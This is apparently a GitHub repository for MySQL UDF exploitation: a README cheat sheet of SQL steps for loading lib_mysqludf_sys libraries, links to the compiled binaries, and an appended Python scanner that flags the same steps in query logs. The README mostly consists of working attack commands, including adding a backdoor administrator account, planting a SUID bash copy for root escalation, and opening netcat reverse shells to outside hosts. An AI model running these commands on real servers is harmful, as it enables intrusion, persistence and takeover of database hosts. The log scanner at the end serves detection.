├── README.md
├── lib_mysqludf_sys_32.dll
├── lib_mysqludf_sys_32.so
├── lib_mysqludf_sys_64.dll
└── lib_mysqludf_sys_64.so


/README.md:
--------------------------------------------------------------------------------
# MySQL UDF Exploitation Simple Cheat Sheet

There is a Turkish (TR) blog post covering this methodology: [`MySQL UDF Exploitations`](https://bariskoparmal.com/2022/02/09/sql-injection-to-different-attack-vectors/).

## *Setup for Windows*

```sql
select @@version_compile_os, @@version_compile_machine;
```
```sql
select @@plugin_dir;
```
```sql
select load_file('\\\\10.0.0.5\\share\\lib_mysqludf_sys_64.dll') into dumpfile "\\udf.dll";
```
```sql
create function sys_bineval returns int soname 'udf.dll';
```
```sql
create function sys_eval returns string soname 'udf.dll';
```
```sql
select * from mysql.func where name = 'sys_bineval';
```
```sql
select * from mysql.func where name = 'sys_eval';
```

## *Command Execution Samples for Windows*

```sql
select sys_eval('dir C:\\Users\\4rch\\Desktop\\');
```
```sql
select sys_exec("net user 4rchantos Passwd1 /add");
```
```sql
select sys_exec("net localgroup Administrators 4rchantos /add");
```
```sql
select sys_eval("net use X: \\\\10.0.0.5\\share /user:user passwd");
```
```sql
select sys_eval("C:\\Users\\4rch\\Desktop\\nc.exe -e cmd.exe 192.168.49.125 80");
```


## *Setup for Linux*

```sql
select @@version_compile_os, @@version_compile_machine;
```
```sql
show variables like '%plugin%';
```
```sql
use mysql;
```
```sql
create table foo(line blob);
```
```sql
insert into foo values(load_file('/tmp/lib_mysqludf_sys_64.so'));
```
```sql
select * from foo into dumpfile '/raptor_udf.so';
```
```sql
create function do_system returns integer soname 'raptor_udf.so';
```
```sql
select * from mysql.func;
```
```sql
select do_system('');
```

## *Privilege Escalation Command Samples for Linux*
```sql
select do_system('cp /bin/bash /tmp/4rch; chmod +xs /tmp/4rch');
```
```bash
/tmp/4rch -p
```
```sql
select do_system('id > /tmp/out; chown raptor.raptor /tmp/out');
```
```sql
\! sh
```

## *Command Execution Samples for Linux*
```sql
select do_system('id > /var/www/output; chown www-data www-data /var/www/output');
```
```sql
select do_system('nc 10.0.0.5 1337 -e /bin/bash');
```

--------------------------------------------------------------------------------
/lib_mysqludf_sys_32.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/koparmalbaris/MySQL-UDF-Exploitation/39bf4a6c90f017dffd9fb9259da3978c9d315907/lib_mysqludf_sys_32.dll

--------------------------------------------------------------------------------
/lib_mysqludf_sys_32.so:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/koparmalbaris/MySQL-UDF-Exploitation/39bf4a6c90f017dffd9fb9259da3978c9d315907/lib_mysqludf_sys_32.so

--------------------------------------------------------------------------------
/lib_mysqludf_sys_64.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/koparmalbaris/MySQL-UDF-Exploitation/39bf4a6c90f017dffd9fb9259da3978c9d315907/lib_mysqludf_sys_64.dll

--------------------------------------------------------------------------------
/lib_mysqludf_sys_64.so:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/koparmalbaris/MySQL-UDF-Exploitation/39bf4a6c90f017dffd9fb9259da3978c9d315907/lib_mysqludf_sys_64.so
--------------------------------------------------------------------------------
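
Seen from the defender's side, the setup steps in the README above (read a library with `load_file`, write it with `into dumpfile`, register it with `create function ... soname`, then call it) leave a recognizable sequence in the MySQL general query log. The following is an added example, not part of the original repository: a Python scan that flags those statements and reports sessions that contain the whole chain. The log line layout, the sample log lines and the rule names are constructed assumptions; the function names in the last rule are the ones the README registers or calls.

```python
import re

# Statement shapes taken from the README's setup and execution steps.
RULES = [
    ("load_file_read", re.compile(r"\bload_file\s*\(", re.I)),
    ("dumpfile_write", re.compile(r"\binto\s+dumpfile\b", re.I)),
    ("udf_registration", re.compile(
        r"\bcreate\s+(?:aggregate\s+)?function\s+\S+\s+returns\s+\w+\s+soname\b", re.I)),
    ("udf_command_call", re.compile(r"\b(?:sys_eval|sys_exec|sys_bineval|do_system)\s*\(", re.I)),
]

# Assumed general query log layout: "<timestamp>\t<thread id> <command>\t<argument>".
LOG_LINE = re.compile(r"^(?P<ts>\S+)\s+(?P<thread>\d+)\s+(?P<cmd>Query|Execute)\s+(?P<sql>.*)$")

# Constructed sample log (not captured from a real server).
SAMPLE_LOG = [
    "2024-05-01T09:00:01.000000Z\t   11 Connect\tapp@10.0.0.8 on shop using TCP/IP",
    "2024-05-01T09:00:02.000000Z\t   11 Query\tselect id, name from products where id = 7",
    "2024-05-01T09:03:10.000000Z\t   12 Query\tselect @@plugin_dir",
    "2024-05-01T09:03:15.000000Z\t   12 Query\tinsert into foo values(load_file('/tmp/lib_mysqludf_sys_64.so'))",
    "2024-05-01T09:03:20.000000Z\t   12 Query\tselect * from foo into dumpfile '/raptor_udf.so'",
    "2024-05-01T09:03:25.000000Z\t   12 Query\tcreate function do_system returns integer soname 'raptor_udf.so'",
    "2024-05-01T09:03:30.000000Z\t   12 Query\tselect do_system('')",
]

def scan(lines):
    """Return one finding per matching rule per log line, in log order."""
    findings = []
    for line in lines:
        m = LOG_LINE.match(line.rstrip("\n"))
        if not m:
            continue  # connect/quit records and continuation lines are skipped
        for name, pattern in RULES:
            if pattern.search(m["sql"]):
                findings.append({"ts": m["ts"], "thread": int(m["thread"]),
                                 "rule": name, "sql": m["sql"]})
    return findings

def sessions_with_full_chain(findings):
    """Thread ids that wrote a file, registered a UDF and called one (order not checked)."""
    by_thread = {}
    for f in findings:
        by_thread.setdefault(f["thread"], set()).add(f["rule"])
    needed = {"dumpfile_write", "udf_registration", "udf_command_call"}
    return sorted(t for t, rules in by_thread.items() if needed <= rules)

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f["ts"], f["thread"], f["rule"], f["sql"])
    print("full chain in threads:", sessions_with_full_chain(scan(SAMPLE_LOG)))
```

The scan only sees what the general query log records, so it depends on that log being enabled and retained on the server.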